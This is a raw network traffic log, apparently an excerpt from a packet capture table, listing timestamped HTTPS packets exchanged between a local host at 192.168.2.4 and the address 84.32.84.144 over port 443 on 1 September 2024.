Sep 1, 2024 18:27:59.471744061 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.471764088 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.472290993 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.472346067 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.472507954 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.472543955 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.472556114 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.472559929 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.472577095 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.472578049 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.472608089 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.472620010 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.472623110 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.472647905 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.473505020 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.473539114 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.473556995 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.473562002 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.473573923 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.473587990 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.473608971 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.473614931 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.473623037 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.473644972 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.474251032 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.474304914 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.474311113 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.474392891 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.474684000 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.474725962 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.474745035 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.474749088 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.474761963 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.474776030 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.474786043 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.474793911 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.474797964 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.474821091 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.474860907 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.475578070 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.475614071 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.475622892 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.475629091 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.475645065 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.475656986 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.475661039 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.475672960 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.475677013 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.475728989 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.475733995 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.476078033 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.476406097 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.476448059 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.476466894 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.476470947 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.476485968 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.476500988 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.476511002 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.476515055 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.476522923 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.476540089 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.476573944 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.476577997 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.476620913 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.514628887 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.514698029 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.514810085 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.514862061 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.561377048 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.561510086 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.561558008 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.561564922 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.561714888 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.561714888 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.561809063 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.561835051 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.561861992 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.561867952 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.561892986 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.561912060 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.562117100 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.562170029 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.562329054 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.562383890 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.562771082 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.562803030 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.562818050 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.562822104 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.562833071 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.562844038 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.562863111 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.562865973 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.562895060 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.563370943 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.563424110 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.563429117 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.563479900 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.563721895 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.563765049 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.563780069 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.563783884 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.563791990 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.563810110 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.563832998 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.563836098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.564410925 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.564450026 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.564455032 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.564459085 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.564487934 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.564502001 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.564523935 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.564527988 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.564532995 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.564570904 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.565366030 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.565397024 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.565423965 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.565427065 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.565434933 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.565443039 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.565463066 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.565466881 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.565470934 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.565516949 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.566279888 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.566309929 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.566325903 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.566329956 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.566339970 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.566346884 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.566376925 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.566380024 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.566418886 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.567023993 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.567076921 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.567178965 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.567214012 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.567229986 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.567233086 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.567243099 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.567257881 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.567270041 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.567282915 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.567287922 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.567316055 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.568006992 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.568064928 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.568070889 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.568135977 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.605442047 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.605506897 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.605669975 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.605720997 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.652201891 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.652245998 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.652374029 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.652422905 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.652431011 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.652467966 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.652635098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.652686119 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.652818918 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.652870893 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.653119087 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.653147936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.653167009 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.653172016 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.653194904 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.653206110 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.653426886 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.653486967 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.653541088 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.653605938 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.654032946 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.654064894 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.654083967 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.654088020 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.654103041 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.654104948 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.654122114 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.654126883 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.654153109 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.654628038 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.654658079 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.654671907 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.654676914 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.654702902 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.655051947 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655095100 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655100107 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.655103922 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655127048 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655141115 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.655147076 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655169964 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.655191898 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.655705929 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655745029 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655761003 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.655765057 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655772924 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655791998 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.655798912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655817986 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.655822992 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.655848980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.655873060 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.656650066 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.656682968 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.656706095 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.656711102 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.656718016 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.656739950 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.656745911 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.656766891 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.656771898 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.656789064 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.656814098 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.657536983 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.657568932 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.657586098 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.657589912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.657599926 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.657615900 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.657629967 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.657636881 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.657640934 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.657674074 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.658396959 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.658427000 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.658449888 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.658457041 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.658477068 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.658489943 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.696423054 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.696477890 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.696587086 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.696638107 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.743251085 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.743320942 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.743357897 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.743402958 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.743741989 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.743792057 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.743809938 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.743856907 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.743925095 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.743951082 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.743971109 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.743979931 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.743993044 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.744015932 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.744350910 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.744395971 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.744697094 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.744745970 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.744837999 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.744868040 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.744884968 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.744889975 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.744903088 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.744927883 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.745291948 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.745321035 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.745388985 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.745394945 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.745433092 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.745927095 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.745961905 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.745980978 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.745985031 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.745999098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.746006966 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.746026039 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.746028900 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.746036053 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.746042967 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.746071100 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.746074915 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.746113062 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.746875048 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.746907949 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.746932983 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.746934891 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.746942997 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.746953964 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.746973038 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.746975899 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747004032 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747019053 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.747023106 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747045040 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.747591972 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747632027 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747639894 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.747643948 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747667074 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747670889 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.747699976 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747710943 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.747714996 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747726917 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747741938 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.747761011 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.747765064 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.747806072 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.748461962 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.748506069 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.748508930 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.748514891 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.748542070 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.748550892 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.748554945 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.748565912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.748580933 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.748604059 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.748608112 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.748646021 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.787389040 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.787430048 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.787445068 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.787453890 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.787470102 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.787488937 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.833859921 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.833962917 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.834072113 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.834218979 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.834280968 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.834311008 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.834331036 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.834336042 CEST	443	56171	84.32.84.144	192.168.2.4
